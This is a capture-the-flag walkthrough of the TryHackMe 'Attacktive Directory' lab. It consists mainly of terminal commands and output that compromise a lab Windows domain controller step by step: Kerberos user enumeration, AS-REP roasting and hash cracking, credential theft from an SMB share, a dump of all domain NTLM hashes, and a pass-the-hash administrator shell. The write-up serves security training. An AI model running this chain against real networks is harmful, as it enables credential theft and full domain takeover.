Lien du CTF : https://tryhackme.com/room/attacktivedirectory
TryHackMe Username : Touco
Tables des matières
- Nmap
- Kerbrute
- Impacket - GetNPUsers
- Hashcat
- SMBClient
- Impacket - Secretdump
- Evil-winrm
- Flags
- Screenshots
Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -O -vv 10.10.101.217
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 11:29 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating Ping Scan at 11:29
Scanning 10.10.101.217 [4 ports]
Completed Ping Scan at 11:29, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning 10.10.101.217 [1000 ports]
Discovered open port 139/tcp on 10.10.101.217
Discovered open port 135/tcp on 10.10.101.217
Discovered open port 53/tcp on 10.10.101.217
Discovered open port 3389/tcp on 10.10.101.217
Discovered open port 80/tcp on 10.10.101.217
Discovered open port 445/tcp on 10.10.101.217
Discovered open port 636/tcp on 10.10.101.217
Discovered open port 464/tcp on 10.10.101.217
Discovered open port 88/tcp on 10.10.101.217
Discovered open port 593/tcp on 10.10.101.217
Discovered open port 3268/tcp on 10.10.101.217
Discovered open port 389/tcp on 10.10.101.217
Discovered open port 3269/tcp on 10.10.101.217
Completed SYN Stealth Scan at 11:29, 1.82s elapsed (1000 total ports)
Initiating Service scan at 11:29
Scanning 13 services on 10.10.101.217
Completed Service scan at 11:29, 7.93s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against 10.10.101.217
Retrying OS detection (try #2) against 10.10.101.217
Retrying OS detection (try #3) against 10.10.101.217
Retrying OS detection (try #4) against 10.10.101.217
Retrying OS detection (try #5) against 10.10.101.217
Initiating Traceroute at 11:29
Completed Traceroute at 11:29, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:29
Completed Parallel DNS resolution of 2 hosts. at 11:29, 0.01s elapsed
NSE: Script scanning 10.10.101.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 8.87s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 1.80s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 10.10.101.217
Host is up, received echo-reply ttl 127 (0.032s latency).
Scanned at 2021-12-11 11:29:12 CET for 31s
Not shown: 987 closed ports
Reason: 987 resets
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-12-11 08:29:20Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2021-12-11T08:29:32+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-10T08:21:44
| Not valid after: 2022-06-11T08:21:44
| MD5: 96cb 3b50 c97b c2fe fd3b e65a d74f 3195
| SHA-1: bd19 408d a723 1ed7 5ae5 adc2 57a4 3809 285c d30f
| -----BEGIN CERTIFICATE-----
| MIIDCjCCAfKgAwIBAgIQHq2XSXt2T5VALukjgmvMYjANBgkqhkiG9w0BAQsFADAu
| MSwwKgYDVQQDEyNBdHRhY2t0aXZlRGlyZWN0b3J5LnNwb29reXNlYy5sb2NhbDAe
| Fw0yMTEyMTAwODIxNDRaFw0yMjA2MTEwODIxNDRaMC4xLDAqBgNVBAMTI0F0dGFj
| a3RpdmVEaXJlY3Rvcnkuc3Bvb2t5c2VjLmxvY2FsMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEA2AP7t7QTjuAOrcJkSDb/hdar1UcX+07rBd0XDIxUyAOK
| +RUuQ2HZBF6UhpvOk76/P1W/xqEmsFKkwDXfKuwBzub0m181xkY40j79cuRFlhFR
| XwNu/M24CeqOLoKABoKg0iCCXDGO39p27xEr6+E3OiQZgw6ugqV+/+0VViqTImbH
| KsEnfk+07FVZiJt2EzUQEYd3gA+kcTj8XI9Yw+8/b6iXNvZHyA7drZ28a4k3zPDA
| xJIzNQMqG3C61Z6rDVZwIdYZYuYPHLc7nhENvgf0tkwwrxYR33ILrlwAM4kNGxgm
| UORUVhJJoKM3m6Mt47OjkMn7V5+a6GqGqcLjxAheAQIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAMrW
| wXZT3tSkSl64HgPH0lRainprhwg3HgL9LtXpfcudqm4kGicUPRX4M+MHZPw8aNeu
| QFyW/VTkYclaGvB0bYwy0cb1tIMAQBvW7XC+EDrzNaK9pDhN1biphlamVMKswsjM
| vp3ElesBsX2cweHpzWj6ZAhYD8tBwd6KwVbwHj9xIhoSbkqMM0yuRmMFy3V8/Kw+
| xAA7shfK4KSttRqMQRy31evHUPG2vYhtvC0WgG7HyAlmwjriMU53HPWkPHJ9mP7E
| n70rOasGQVY6N+BQUIhRd5SUYIqvZISBbBmtdv+UQshgPELp8VViLnNPqkeZSgUJ
| 96O4EKua+DVRcdzr2pk=
|_-----END CERTIFICATE-----
|_ssl-date: 2021-12-11T08:29:42+00:00; -2h00m00s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/11%OT=53%CT=1%CU=38528%PV=Y%DS=2%DC=T%G=Y%TM=61B47D
OS:97%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS
OS:=U)OPS(O1=M505NW8NNS%O2=M505NW8NNS%O3=M505NW8%O4=M505NW8NNS%O5=M505NW8NN
OS:S%O6=M505NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y
OS:%DF=Y%T=80%W=FFFF%O=M505NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD
OS:=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 60858/tcp): CLEAN (Couldn't connect)
| Check 2 (port 12641/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55562/udp): CLEAN (Failed to receive data)
| Check 4 (port 19467/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-11T08:29:33
|_ start_date: N/A
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 32.19 ms 10.8.0.1
2 31.96 ms 10.10.101.217
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.10 seconds
Raw packets sent: 1122 (52.914KB) | Rcvd: 1091 (46.902KB)
Kerbrute
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ sudo ./kerbrute_linux_amd64 userenum ../userlist.txt -d spookysec.local --dc 10.10.101.217
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.2 (fd5f345) - 12/11/21 - Ronnie Flathers @ropnop
2021/12/11 12:02:05 > Using KDC(s):
2021/12/11 12:02:05 > 10.10.101.217:88
2021/12/11 12:02:05 > [+] VALID USERNAME: james@spookysec.local
2021/12/11 12:02:06 > [+] VALID USERNAME: svc-admin@spookysec.local
2021/12/11 12:02:07 > [+] VALID USERNAME: James@spookysec.local
2021/12/11 12:02:07 > [+] VALID USERNAME: robin@spookysec.local
2021/12/11 12:02:11 > [+] VALID USERNAME: darkstar@spookysec.local
2021/12/11 12:02:13 > [+] VALID USERNAME: administrator@spookysec.local
2021/12/11 12:02:18 > [+] VALID USERNAME: backup@spookysec.local
2021/12/11 12:02:20 > [+] VALID USERNAME: paradox@spookysec.local
2021/12/11 12:02:34 > [+] VALID USERNAME: JAMES@spookysec.local
2021/12/11 12:02:38 > [+] VALID USERNAME: Robin@spookysec.local
2021/12/11 12:03:05 > [+] VALID USERNAME: Administrator@spookysec.local
2021/12/11 12:03:59 > [+] VALID USERNAME: Darkstar@spookysec.local
2021/12/11 12:04:16 > [+] VALID USERNAME: Paradox@spookysec.local
2021/12/11 12:05:18 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2021/12/11 12:05:32 > [+] VALID USERNAME: ori@spookysec.local
2021/12/11 12:06:01 > [+] VALID USERNAME: ROBIN@spookysec.local
2021/12/11 12:07:20 > Done! Tested 73317 usernames (16 valid) in 315.206 seconds
Impacket - GetNPUsers
┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ python3 GetNPUsers.py spookysec.local/ -usersfile users.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f95eab8462368a4f0cca10b2cae2dea7$9948054194d0bc31e9490e81defc1361231305090281dabc4526977be9b8ce8e7958cc9f4eaeedffe826794d07b8104d4750643aa20e7efdda29e971b6d71096dc0cd8bb95075ff98a38f0cb9fe470365d8dfa0f8941003c6abe02c9d1081cccc82472eb7ed40d116d41fa36eda004c573d34d0f1f56feddace3c9250a0595c83aebd0a491f84ec61fd880d1341f21b7ce2980f631d3bcc07408d04b6bd3f814dae8d0be04503802c1bc1e2aa66f8fbaa96f03fc00361451ebdc402890bd9e329e9cabc81a15a17520d02f813b186754af06f71863085349de3f871699ec03874ea85660e333aa220afec75e4173dfce8f55
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set
Hashcat
┌──(kali㉿kali)-[~]
└─$ sudo hashcat -O -m 18200 hash passwordlist.txt --show 1 ⚙
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f95eab8462368a4f0cca10b2cae2dea7$9948054194d0bc31e9490e81defc1361231305090281dabc4526977be9b8ce8e7958cc9f4eaeedffe826794d07b8104d4750643aa20e7efdda29e971b6d71096dc0cd8bb95075ff98a38f0cb9fe470365d8dfa0f8941003c6abe02c9d1081cccc82472eb7ed40d116d41fa36eda004c573d34d0f1f56feddace3c9250a0595c83aebd0a491f84ec61fd880d1341f21b7ce2980f631d3bcc07408d04b6bd3f814dae8d0be04503802c1bc1e2aa66f8fbaa96f03fc00361451ebdc402890bd9e329e9cabc81a15a17520d02f813b186754af06f71863085349de3f871699ec03874ea85660e333aa220afec75e4173dfce8f55:management2005
SMBClient
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ smbclient -L 10.10.101.217 -U svc-admin 130 ⨯
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ smbclient //10.10.101.217/backup -U svc-admin
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 21:08:39 2020
.. D 0 Sat Apr 4 21:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 21:08:53 2020
8247551 blocks of size 4096. 3636433 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ ls
backup_credentials.txt
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ more backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ base64 -d b64
backup@spookysec.local:backup2517860
Impacket - Secretdump
┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ sudo secretsdump.py -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.101.217 1 ⚙
[sudo] Mot de passe de kali :
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:091a2827452fa9a7eb93398f8feea937:::
[*] Cleaning up...
Evil-winrm
┌──(kali㉿kali)-[~/…/kerbrute/dist/v1.0.2/evil-winrm]
└─$ ruby evil-winrm.rb -i 10.10.101.217 -H 0e0363213e37b94221497260b0bcb4fc -u administrator 1 ⨯
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd c:
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd c:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/4/2020 11:32 AM inetpub
d----- 9/17/2020 4:43 PM PerfLogs
d-r--- 4/4/2020 11:26 AM Program Files
d----- 9/15/2018 2:06 AM Program Files (x86)
d----- 4/4/2020 12:07 PM Shares
d-r--- 9/17/2020 4:03 PM Users
d----- 9/17/2020 4:46 PM Windows
*Evil-WinRM* PS C:\> cd users
*Evil-WinRM* PS C:\users> dir
Flags
*Evil-WinRM* PS C:\> dir C:\users\backup\Desktop\
Directory: C:\users\backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:19 PM 26 PrivEsc.txt
*Evil-WinRM* PS C:\> more C:\users\backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\> dir C:\users\svc-admin\Desktop\
Directory: C:\users\svc-admin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:18 PM 28 user.txt.txt
*Evil-WinRM* PS C:\> more C:\users\svc-admin\Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\> dir C:\users\administrator\Desktop\
Directory: C:\users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 11:39 AM 32 root.txt
*Evil-WinRM* PS C:\> more C:\users\administrator\Desktop\root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
Screenshots
